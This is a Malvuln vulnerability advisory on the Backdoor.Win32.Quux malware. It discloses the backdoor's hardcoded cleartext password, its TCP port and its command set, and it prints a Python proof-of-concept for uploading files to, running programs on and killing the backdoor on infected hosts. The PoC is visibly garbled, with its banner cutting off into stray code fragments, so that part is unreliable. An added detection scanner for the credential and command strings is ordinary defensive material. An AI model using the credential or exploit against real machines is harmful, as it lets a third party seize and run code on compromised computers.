Backdoor.Win32.Quux / Weak Hardcoded Credentials

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022
Original source: https://malvuln.com/advisory/13ce53de9ca4c4e6c58f990b442cb419.txt
Contact: [email protected]
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Quux
Vulnerability: Weak Hardcoded Credentials
Family: Quux
Type: PE32
MD5: 13ce53de9ca4c4e6c58f990b442cb419
Vuln ID: MVID-2022-0656
Dropped files: quux32.exe
Disclosure: 11/15/2022

Description:
The malware listens on TCP port 3. Authentication is required; however, the password "Faraon" (Romanian for "Pharaoh") is weak and hardcoded in cleartext within the PE file. Third-party adversaries who can reach an infected host can call the commands made available by the backdoor, which include uploading files and code execution. A custom client is needed to communicate with the infected host, because nc64.exe and telnet append LF characters and will fail authentication when sending credentials containing "\n" etc. Once connected, any files sent will be written to Windows\System unless the "SetCurrDir" command is called first.

0040AD24 ; char aFaraon[]
0040AD24 aFaraon db 'Faraon',0 ; DATA XREF: _WinMain@16_0+376↑o
0040AD2B align 100h

[Commands]
SetCurrDir
GetCurrDir
GetCurrentDirectory
Exec
GetFile
SendFile
quit
exit
shutdown
dir
CreateFile
DeleteFile
MessageBox
die

Exploit/PoC: "quux32_xploit.py"

from socket import *
import time, sys

BANNER="""
 ____ ____ ___ ____ __ _ __
/ __ \__ ____ ____ __ |_ /|_ | / __/_ __ ___ / /__ (_) /_
/ /_/ / // / // / /_/_
")
if _file:
upload(_file)
else:
exit(1)
elif CMD=="2":
pgm=input("[-] Program to run: > ")
if pgm:
execute(pgm)
else:
exit(1)
elif CMD=="3":
choice=input("[-] Kill server? 1=Yes > ")
if choice.lower()=="1":
kill_srv()
else:
print("[!] Invalid IP!")
exit(1)
else:
print("[*] QuuX32 Exploit Usage:\n[-]IP: x.x.x.x, Command (1=Upload file, 2=Exec program, 3=Kill server)")
exit(1)

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not a ..
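As an added detection example, not part of the original advisory or Malvuln's PoC, the following Python scans a buffer or file for the cleartext credential and the command vocabulary listed above; the sample buffer is constructed here and is not bytes from the real quux32.exe:

```python
import re
import sys

# Indicators quoted from the advisory: the cleartext credential stored as
# db 'Faraon',0 and the backdoor's [Commands] vocabulary.
CREDENTIAL = b"Faraon"
COMMANDS = {b"SetCurrDir", b"GetCurrDir", b"GetCurrentDirectory", b"Exec",
            b"GetFile", b"SendFile", b"quit", b"exit", b"shutdown", b"dir",
            b"CreateFile", b"DeleteFile", b"MessageBox", b"die"}

def nul_terminated_strings(data, min_len=3):
    """Yield (offset, bytes) for printable-ASCII runs terminated by a NUL byte,
    the layout the advisory shows for the credential (db 'Faraon',0).
    min_len=3 keeps the short commands "dir" and "die" in scope."""
    for m in re.finditer(rb"[\x20-\x7e]{%d,}\x00" % min_len, data):
        yield m.start(), m.group()[:-1]

def scan_for_quux_indicators(data):
    """Report where the credential sits and which command names are present."""
    strings = list(nul_terminated_strings(data))
    return {
        "credential_offsets": [off for off, s in strings if s == CREDENTIAL],
        "commands": sorted(s for _, s in strings if s in COMMANDS),
    }

def looks_like_quux(report, min_commands=5):
    """Require the credential plus several commands to limit false positives
    from benign binaries that merely contain a word such as "Exec"."""
    return bool(report["credential_offsets"]) and len(report["commands"]) >= min_commands

# Constructed sample resembling the .data region described in the advisory
# (not bytes from the real quux32.exe).
SAMPLE = (b"\x00" * 16 + b"Faraon\x00" + b"\x00" * 9
          + b"SetCurrDir\x00GetCurrDir\x00Exec\x00GetFile\x00SendFile\x00quit\x00dir\x00")

if __name__ == "__main__":
    # Pass a file path to scan a real binary; otherwise the constructed sample is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    rep = scan_for_quux_indicators(data)
    print("credential offsets:", [hex(o) for o in rep["credential_offsets"]])
    print("commands found:", [c.decode() for c in rep["commands"]])
    print("matches advisory profile:", looks_like_quux(rep))
```

Offsets are file offsets into the scanned buffer, so map them through the section table if you want to compare against the 0040AD24 virtual address quoted in the advisory.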
